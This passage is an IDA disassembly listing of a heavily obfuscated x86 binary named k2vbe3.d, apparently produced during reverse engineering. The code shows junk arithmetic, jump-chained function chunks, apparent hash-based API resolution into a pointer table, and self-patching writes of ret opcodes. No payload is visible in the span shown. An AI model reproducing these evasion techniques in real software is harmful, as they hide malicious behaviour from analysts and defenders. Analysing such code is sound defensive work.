; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_45B51E:				; CODE XREF: sub_454E83-5048j
		jmp	loc_454284
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
		push	eax
; START	OF FUNCTION CHUNK FOR sub_4469E1

loc_45B524:				; CODE XREF: sub_4469E1+132B9j
		call	sub_43C3A9
; END OF FUNCTION CHUNK	FOR sub_4469E1
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_45B529:				; CODE XREF: sub_43D7A9+20D4j
		push	0D9A63FBAh
		pop	eax
		jmp	loc_45B2FC
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_45B534:				; CODE XREF: sub_44D2F1:loc_44BB10j
					; k2vbe3.d:0045122Fj
		call	sub_45AE8E
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_45B539:				; CODE XREF: sub_4582DD+11j
		jmp	loc_43EDD2
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
		pushf
		sbb	edi, edx
		jmp	loc_459159
; ---------------------------------------------------------------------------

loc_45B546:				; DATA XREF: sub_45A634:loc_43CE7Fo
		push	33FC99C3h
		pop	eax
		and	eax, 158D41B2h
		sub	eax, 74B9A2C9h
		or	eax, 373089D7h
		add	eax, 400D2121h
		call	sub_44ADEC
		jmp	loc_458C62
; ---------------------------------------------------------------------------
		jmp	loc_4555B5
; ---------------------------------------------------------------------------

loc_45B573:				; CODE XREF: k2vbe3.d:0045B613j
		jnz	loc_43C1EF
		jmp	loc_4512CA
; ---------------------------------------------------------------------------
		mov	ds:dword_41E110, eax
		lea	eax, nullsub_508
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_508

; =============== S U B	R O U T	I N E =======================================



sub_45B592	proc near		; CODE XREF: sub_40D41A+11Dp
					; sub_45B592:loc_44CAF9j
					; DATA XREF: ...

; FUNCTION CHUNK AT 0044CAF9 SIZE 00000006 BYTES

		call	sub_44CB04
		jmp	loc_44CAF9
sub_45B592	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_45B59C:				; CODE XREF: sub_444B3E:loc_4407D1j
					; k2vbe3.d:004407E3j
		xor	eax, 4CECD364h
		call	sub_4553CC
		mov	ds:dword_41E178, eax
		lea	eax, nullsub_4
		mov	byte ptr [eax],	0C3h
		jmp	loc_443893
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

loc_45B5BB:				; CODE XREF: k2vbe3.d:loc_45184Bj
		mov	eax, [esp]
		jmp	loc_457D07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_45B5C3:				; CODE XREF: sub_453AE8-562Bj
		push	3CD4B6B7h
		pop	edi
		or	edi, 5B722BC4h
		rol	edi, 1Dh
		and	edi, 0AA2910EAh
		add	edi, 561DA775h
		xchg	edi, [esp+4+var_4]
		jmp	loc_44DD44
; END OF FUNCTION CHUNK	FOR sub_453AE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_45B5E6:				; CODE XREF: sub_4580DF:loc_44E8B9j
		or	eax, eax
		jz	loc_43F765
		jmp	loc_448E4C
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E2A4

loc_45B5F3:				; CODE XREF: sub_44E2A4:loc_44D26Dj
		xor	edi, 9CFB70E9h
		add	edi, 2B9AF63Bh
		rol	edi, 0Fh
		test	edi, 100000h
		jmp	loc_4412ED
; END OF FUNCTION CHUNK	FOR sub_44E2A4
; ---------------------------------------------------------------------------

loc_45B60D:				; CODE XREF: k2vbe3.d:loc_442816j
		jz	loc_44266B
		jmp	loc_45B573
; ---------------------------------------------------------------------------
		jb	loc_440582
		jmp	sub_443528
; ---------------------------------------------------------------------------

loc_45B623:				; DATA XREF: k2vbe3.d:loc_44ACD2o
		add	eax, 9C6E7008h
		xchg	eax, [esp]
		jmp	sub_447BE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D863

loc_45B631:				; CODE XREF: sub_44D863:loc_455AA4j
		add	eax, 86910E07h
		and	eax, 0A94D27DBh
		xor	eax, 0E307D4BEh
		add	eax, ebp
		jmp	loc_45578A
; END OF FUNCTION CHUNK	FOR sub_44D863

; =============== S U B	R O U T	I N E =======================================



sub_45B64A	proc near		; CODE XREF: k2vbe3.d:0045731Cj
					; k2vbe3.d:loc_457D07p

; FUNCTION CHUNK AT 004455F6 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edx
		push	offset sub_44D4FF
		jmp	loc_4455F6
sub_45B64A	endp

; ---------------------------------------------------------------------------

loc_45B659:				; CODE XREF: k2vbe3.d:00444FD9j
		push	offset sub_445124
		jmp	locret_45B10A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436CE

loc_45B663:				; CODE XREF: sub_4436CE+17338j
		lea	edx, [ebp+var_14]
		mov	eax, offset loc_4411D8
		call	sub_45B74D
		lea	eax, [ebp+var_14]
		push	eax
		jmp	loc_44DD59
; END OF FUNCTION CHUNK	FOR sub_4436CE
; ---------------------------------------------------------------------------

loc_45B679:				; CODE XREF: k2vbe3.d:loc_44C3A0j
		xor	edi, 9993937Fh
		add	edi, ebp
		add	edi, 0D993934Ch
		push	offset sub_44B5DC
		jmp	locret_43CE9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_45B691:				; CODE XREF: sub_44DD31+D150j
					; DATA XREF: sub_43D83F+CD54o
		jmp	loc_4497C6
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
		jmp	loc_444C96

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45B69B	proc near		; CODE XREF: sub_44C90E+4p

; FUNCTION CHUNK AT 0043F664 SIZE 0000000A BYTES

		push	ebp
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		jmp	loc_43F664
sub_45B69B	endp

; ---------------------------------------------------------------------------

locret_45B6A6:				; CODE XREF: k2vbe3.d:0043C243j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DA2

loc_45B6A7:				; CODE XREF: sub_449DA2+9j
		jmp	loc_43F70D
; END OF FUNCTION CHUNK	FOR sub_449DA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_45B6AC:				; CODE XREF: sub_43FF90+8F15j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4517AE

loc_45B6B1:				; CODE XREF: sub_4517AE:loc_459EA0j
		lea	eax, sub_456C5F
		mov	byte ptr [eax],	0C3h
		jmp	sub_456C5F
; END OF FUNCTION CHUNK	FOR sub_4517AE
; ---------------------------------------------------------------------------
		call	nullsub_476
		jmp	ds:dword_41E188
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_476. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		xchg	eax, edx
		rol	dword ptr [ebx+0], 1
		jmp	locret_455D10
; ---------------------------------------------------------------------------
		ror	ecx, 1Ah
		jmp	sub_44032C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_45B6DC:				; CODE XREF: sub_440D7B+9055j
		sub	eax, [ebp+var_28]
		mov	[ebp+var_24], eax
		mov	eax, [ebp+var_24]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------

loc_45B6E9:				; CODE XREF: k2vbe3.d:loc_44A147j
		mov	ebx, edx
		xchg	ebx, [esp]
		call	sub_454E83
		mov	eax, 9DD7AB44h
		call	sub_4553CC
		jmp	loc_44AA38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_45B702:				; CODE XREF: sub_43F2E0:loc_43FF2Ej
		xchg	ebx, [esp+4+var_4]
		jmp	sub_4570C0
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------

loc_45B70A:				; CODE XREF: k2vbe3.d:0044F696j
		ja	loc_45768A

; =============== S U B	R O U T	I N E =======================================



sub_45B710	proc near		; CODE XREF: sub_44367E+1p

; FUNCTION CHUNK AT 00459AE5 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	ebp, esp
		push	ecx
		jmp	loc_459AE5
sub_45B710	endp

; ---------------------------------------------------------------------------

loc_45B71C:				; CODE XREF: k2vbe3.d:00446F9Cj
		lea	eax, loc_44AC7F
		mov	byte ptr [eax],	0C3h
		jmp	loc_44AC7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45B72A:				; CODE XREF: sub_45A323-F69Ej
		mov	eax, [esp+4+var_4]
		push	edx
		push	edx
		push	0BF7A0695h
		jmp	loc_442910
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C248

loc_45B739:				; CODE XREF: sub_43C248:loc_4587DEj
		call	sub_45B74D

loc_45B73E:				; CODE XREF: sub_44C6CA+7j
					; sub_44C6EC+30DFj
		mov	eax, ds:dword_441204
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43C248

; =============== S U B	R O U T	I N E =======================================



sub_45B74D	proc near		; CODE XREF: sub_44945C-95F1p
					; k2vbe3.d:00440530p ...

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043C942 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004403CD SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004405CF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443C1B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444CEB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446ACF SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00450F19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454EEC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045595F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457924 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045AD8B SIZE 00000005 BYTES

		push	ebp
		jmp	loc_446ACF
sub_45B74D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_45B753:				; CODE XREF: sub_444B3E:loc_4407D7j
		mov	edx, ebp
		xchg	edx, [esp+0]
		mov	ebp, esp
		push	ecx
		jmp	loc_44B395
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

locret_45B760:				; CODE XREF: k2vbe3.d:004473C0j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_45B761:				; CODE XREF: sub_44B2D7+8E6Ej
		jmp	loc_44EEA1
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A58

loc_45B766:				; CODE XREF: sub_457A58-BBC7j
		jmp	nullsub_430
; END OF FUNCTION CHUNK	FOR sub_457A58

; =============== S U B	R O U T	I N E =======================================



sub_45B76B	proc near		; CODE XREF: k2vbe3.d:00450FDDp
					; k2vbe3.d:00457A70j
		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_446E1E
		mov	eax, 0B98DBDD7h
		call	sub_4553CC
		push	edx
		push	offset sub_4431FE
		jmp	loc_45B341
sub_45B76B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F6B

loc_45B789:				; CODE XREF: sub_455F6B+4j
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		push	edi
		push	4F28D788h
		jmp	loc_441FD7
; END OF FUNCTION CHUNK	FOR sub_455F6B
; ---------------------------------------------------------------------------
		xor	edi, 0C20500AFh
		jmp	loc_445157
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545C4

loc_45B7A4:				; CODE XREF: sub_4545C4-D374j
		call	sub_451759
		push	edx
		push	22EBB03Bh
		pop	edx
		rol	edx, 1Fh
		jmp	loc_44AB96
; END OF FUNCTION CHUNK	FOR sub_4545C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CCE

loc_45B7B8:				; CODE XREF: sub_451CCE+6j
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
		call	sub_454E83
		push	4900A945h
		xchg	edi, [esp+4+var_4]
		jmp	loc_440CE0
; END OF FUNCTION CHUNK	FOR sub_451CCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_45B7D4:				; CODE XREF: sub_45482D:loc_440018j
		pop	esi
		sub	esi, 127DAFE9h
		rol	esi, 9
		cmp	esi, 0FE8BE474h
		jmp	loc_447C57
; END OF FUNCTION CHUNK	FOR sub_45482D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_45B7E9:				; CODE XREF: sub_457580-DEC3j
		jnz	loc_448F6D
		jmp	loc_45715A
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------

loc_45B7F4:				; DATA XREF: sub_43D823+1837Bo
		cmp	dword ptr [ebp-8], 0
		jz	loc_442405
		jmp	loc_45297D
; ---------------------------------------------------------------------------
		mov	eax, 510AEA73h
		call	sub_4553CC

loc_45B80D:				; CODE XREF: k2vbe3.d:loc_441B5Aj
		mov	ds:dword_41E120, eax
		lea	eax, nullsub_2
		mov	byte ptr [eax],	0C3h
		jmp	loc_441214
; ---------------------------------------------------------------------------
		push	edi
		push	0BA7B49EDh
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_45B827:				; CODE XREF: sub_444B3E:loc_44B7ADj
		pop	edi
		add	edi, 3E7BD2B7h

loc_45B82E:				; CODE XREF: sub_45A323-17512j
		rol	edi, 19h
		add	edi, 1A58D2F1h
		cmp	edi, 95AB16D2h
		jmp	loc_4426B6
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

loc_45B842:				; CODE XREF: k2vbe3.d:0044E696j
		jnz	loc_44F90E
		or	eax, 3F6FEAE1h
		sub	ecx, 0F6E738F9h
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_45B855:				; CODE XREF: sub_44DD31+948j
		push	offset loc_44E7FF
		jmp	loc_440A6F
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		ror	eax, 12h
		jmp	loc_44A0A1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_106. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45504A

loc_45B86E:				; CODE XREF: sub_45504A+7j
		jmp	nullsub_518
; END OF FUNCTION CHUNK	FOR sub_45504A
; ---------------------------------------------------------------------------

loc_45B873:				; CODE XREF: k2vbe3.d:0044E9C1j
		jmp	locret_44B2C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_45B878:				; CODE XREF: sub_44662B:loc_43CBD4j
		jg	loc_44953C
		sub	edx, ebx
		jmp	loc_44D171
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_45B885:				; CODE XREF: sub_4467A1:loc_44B506j
		add	esi, 68004316h
		popf
		xchg	esi, [esp-8+arg_4]
		jmp	loc_459399
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4503D6

loc_45B894:				; CODE XREF: sub_4503D6+7j
		xchg	ebx, [esp+0]
		mov	esp, ebp
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		call	sub_43D488
; END OF FUNCTION CHUNK	FOR sub_4503D6
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_45B8A4:				; CODE XREF: sub_45512F:loc_45BA35j
		jz	loc_45C354
		jmp	loc_442DC5
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------
		mov	eax, 0C0F1A028h
		call	sub_4553CC
		mov	ds:dword_41E144, eax
		lea	eax, nullsub_467
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B21B
; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		mov	edx, esi
		jmp	loc_44C92C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_45B8D7:				; CODE XREF: sub_44C90E+B2FBj
		jle	loc_452CE7
		pushf
		mov	[ebp+0], edi

loc_45B8E1:				; CODE XREF: sub_44C90E:loc_441B4Fj
		push	9E03D141h
		pop	eax
		sub	eax, 0EA754789h
		jmp	loc_452FBD
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_45B8F2:				; CODE XREF: sub_446E24:loc_44510Aj
		sub	eax, 4E8CDA8Ch
		jmp	loc_45B2CE
; END OF FUNCTION CHUNK	FOR sub_446E24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_535. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_484. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_45B8FF:				; CODE XREF: sub_43D0A9:loc_44F847j
		rol	eax, 1Eh
		add	eax, 157EC3F7h
		call	sub_4553CC
		push	ebx
		push	28FA7220h
		pop	ebx
		and	ebx, 29D53807h
		rol	ebx, 3
		jmp	loc_45559B
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_45B922:				; CODE XREF: sub_44067C:loc_43E41Aj
		xchg	ebx, [esp+0]
		jmp	loc_44D632
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_45B92A:				; CODE XREF: sub_440C94+155C3j
		sub	edx, ds:4000EBh
		or	edx, 4BA74391h
		add	edx, 80458584h
		xchg	edx, [esp+8+var_8]
		jmp	loc_43F33D
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------

loc_45B944:				; CODE XREF: k2vbe3.d:loc_45AA39j
		jz	loc_44A78F
		jmp	loc_45954D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A641

loc_45B94F:				; CODE XREF: sub_44A641-B0C2j
		push	eax
		push	0ACCDEA7Fh
; END OF FUNCTION CHUNK	FOR sub_44A641
; START	OF FUNCTION CHUNK FOR sub_445541

loc_45B955:				; CODE XREF: sub_445541-833Fj
		pop	eax
		or	eax, 0F580E7BDh
		xor	eax, 0DBE82BFFh
		add	eax, 0DA1E2199h
		jmp	loc_449680
; END OF FUNCTION CHUNK	FOR sub_445541
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_45B96E:				; CODE XREF: sub_44D0D5-4724j
		xor	eax, 0D40921B9h
		sub	eax, 0EDAFEEE3h
		ror	eax, 16h
		jmp	loc_43FC4D
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_45B982:				; CODE XREF: sub_446E24:loc_4480F8j
		ror	eax, 1Fh
		shr	ebx, 12h
		jp	loc_442255

loc_45B98E:				; CODE XREF: sub_4570C0:loc_451BB4j
		ror	ebx, 0Ch
		jmp	loc_45B003
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45064D

loc_45B996:				; CODE XREF: sub_45064D:loc_445EA6j
		jnz	loc_4465FA
		jmp	loc_448BA7
; END OF FUNCTION CHUNK	FOR sub_45064D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_45B9A1:				; CODE XREF: sub_440C94+70E1j
		jnz	loc_43D59A
		jmp	loc_44F228
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_45B9AC:				; CODE XREF: sub_441885+A590j
		cmp	esi, ebx
		jmp	loc_449F4C
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------
		jz	loc_457C9A
		jmp	sub_45088F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D887

loc_45B9BE:				; CODE XREF: sub_44D887-7A0Aj
		push	0CD7CB998h
		pop	edi
		xor	edi, 5F21047Eh
		and	edi, 370EE885h
		add	edi, 0EE388B5Ah
		jmp	loc_4533D6
; END OF FUNCTION CHUNK	FOR sub_44D887
; ---------------------------------------------------------------------------
		test	ebp, 22C70DA4h
		jmp	loc_4532EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45B9E6:				; CODE XREF: sub_45A323-19626j
		jnp	loc_44257A
		rol	eax, 10h
		jmp	loc_45ABD4
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_45B9F4:				; CODE XREF: k2vbe3.d:loc_459422j
		xor	eax, 1D0D0D27h
		add	eax, 75D6730Ch
		call	sub_45A08C
; START	OF FUNCTION CHUNK FOR sub_44F49C

loc_45BA05:				; CODE XREF: sub_44F49C+3j
		jmp	loc_453F33
; END OF FUNCTION CHUNK	FOR sub_44F49C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED1F

loc_45BA0A:				; CODE XREF: sub_43ED1F+8511j
		jmp	loc_43D20D
; END OF FUNCTION CHUNK	FOR sub_43ED1F
; ---------------------------------------------------------------------------

loc_45BA0F:				; CODE XREF: k2vbe3.d:0044AE0Dj
		ror	eax, 18h

loc_45BA12:				; CODE XREF: k2vbe3.d:loc_450562j
		push	offset loc_445E9B
		jmp	locret_44913E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_365. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_45BA1D:				; CODE XREF: sub_444D7B+71A5j
		jmp	loc_44C0E0
; END OF FUNCTION CHUNK	FOR sub_444D7B

; =============== S U B	R O U T	I N E =======================================



sub_45BA22	proc near		; CODE XREF: k2vbe3.d:00449B39j
					; sub_45AA25+Ap

; FUNCTION CHUNK AT 00459629 SIZE 0000000E BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [ebp-4]
		mov	al, [eax]
		call	sub_44DB59

loc_45BA30:				; CODE XREF: k2vbe3.d:0045103Fj
		jmp	loc_459629
sub_45BA22	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_45BA35:				; CODE XREF: sub_45512F-18481j
		jmp	loc_45B8A4
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_45BA3A:				; CODE XREF: sub_44CA34+4BF8j
		jz	loc_450D7A
		jmp	loc_44A116
; END OF FUNCTION CHUNK	FOR sub_44CA34

; =============== S U B	R O U T	I N E =======================================



sub_45BA45	proc near		; DATA XREF: sub_4440E5:loc_457C8Ao

; FUNCTION CHUNK AT 0044B214 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452030 SIZE 00000005 BYTES

		push	ebx
		push	8C6F77EEh
		pop	ebx
		add	ebx, 0C3795741h
		xor	ebx, ds:4000EAh
		sub	ebx, 0DB48FE6h
		rol	ebx, 1Ch
		add	ebx, 1FDCE009h
		jmp	loc_452030
sub_45BA45	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452ECC

loc_45BA6C:				; CODE XREF: sub_452ECC:loc_451CE0j
		xchg	eax, [esp+0]
		mov	ebx, edx
		xchg	ebx, [esp+0]
		call	sub_454E83
		mov	eax, 0F2B89A19h
		call	sub_4553CC
		mov	ds:off_41E090, eax
		lea	eax, sub_452ECC
		jmp	loc_45AB13
; END OF FUNCTION CHUNK	FOR sub_452ECC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_45BA94:				; CODE XREF: sub_457D4B-E394j
		xor	ebp, edi

loc_45BA96:				; CODE XREF: sub_457D4B:loc_4502CAj
		mov	eax, 3CFDF720h
		push	edi
		push	6FD905DCh
		xchg	ebp, [esp+8+var_8]
		mov	edi, ebp
		jmp	loc_452F38
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A39

loc_45BAAB:				; CODE XREF: sub_451A39+70CEj
		mov	byte ptr [eax],	0C3h
		jmp	sub_445FE0
; END OF FUNCTION CHUNK	FOR sub_451A39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445FE0

loc_45BAB3:				; CODE XREF: sub_445FE0+6j
		mov	eax, [esp-4+arg_0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		push	eax
		jmp	loc_452143
; END OF FUNCTION CHUNK	FOR sub_445FE0
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E15C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_225. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		or	al, 24h
		mov	edx, ecx
		push	offset loc_456FB4
		jmp	loc_44B0D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_45BAD7:				; CODE XREF: sub_450F71-3FE7j
		jbe	loc_44F824

loc_45BADD:				; CODE XREF: sub_450F71:loc_444504j
		and	eax, 3999B0D4h
		add	eax, 330CCCh

loc_45BAE9:				; CODE XREF: sub_449372:loc_4564D1j
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_453D77
		jmp	loc_43F036
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		xchg	ecx, [esp]
		add	edx, 16A86D0Fh
		jmp	loc_45479A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_45BB06:				; CODE XREF: sub_440CEA:loc_4588D7j
		and	ebx, 33812664h
		jmp	loc_4536D5
; END OF FUNCTION CHUNK	FOR sub_440CEA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_45BB12	proc near		; DATA XREF: sub_43DF1A+Bo
		pop	ebx
		lea	eax, loc_44772F
		mov	byte ptr [eax],	0C3h
		jmp	loc_44772F
sub_45BB12	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45BB21:				; CODE XREF: k2vbe3.d:004557A2j
		mov	eax, [esp]
		push	edx
		push	ecx
		push	0D3E78A03h
		jmp	loc_446DAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4524D2

loc_45BB30:				; CODE XREF: sub_4524D2+7j
		push	eax
		mov	eax, [ebp-18h]
		shl	eax, 2
		cdq
		jns	loc_444746
		add	eax, [esp+4+var_4]
		adc	edx, [esp+4]
		add	esp, 8
		jmp	loc_4489FA
; END OF FUNCTION CHUNK	FOR sub_4524D2

; =============== S U B	R O U T	I N E =======================================



sub_45BB4D	proc near		; DATA XREF: k2vbe3.d:0045069Bo

; FUNCTION CHUNK AT 0045949A SIZE 00000014 BYTES

		push	edx
		call	sub_444FB1
		mov	eax, 0D59435E2h
		call	sub_4553CC
		jmp	loc_45949A
sub_45BB4D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45051F

loc_45BB62:				; CODE XREF: sub_45051F-D188j
		add	esi, 7D04B96Ch
		xchg	esi, [esp+0]
		jmp	loc_457C85
; END OF FUNCTION CHUNK	FOR sub_45051F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F614

loc_45BB70:				; CODE XREF: sub_44F614:loc_442941j
		sub	eax, 6D5E4E6Eh
		xor	eax, 2BABBE9Eh
		push	offset sub_456DE9
		jmp	nullsub_468
; END OF FUNCTION CHUNK	FOR sub_44F614
; ---------------------------------------------------------------------------

loc_45BB86:				; CODE XREF: k2vbe3.d:00448638j
		xor	edx, esi

; =============== S U B	R O U T	I N E =======================================



sub_45BB88	proc near		; CODE XREF: sub_44081A+6p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044A3A9 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00450077 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	esi
		jmp	loc_450077
sub_45BB88	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45BB96:				; CODE XREF: k2vbe3.d:0043E9EAj
		test	edi, ebp
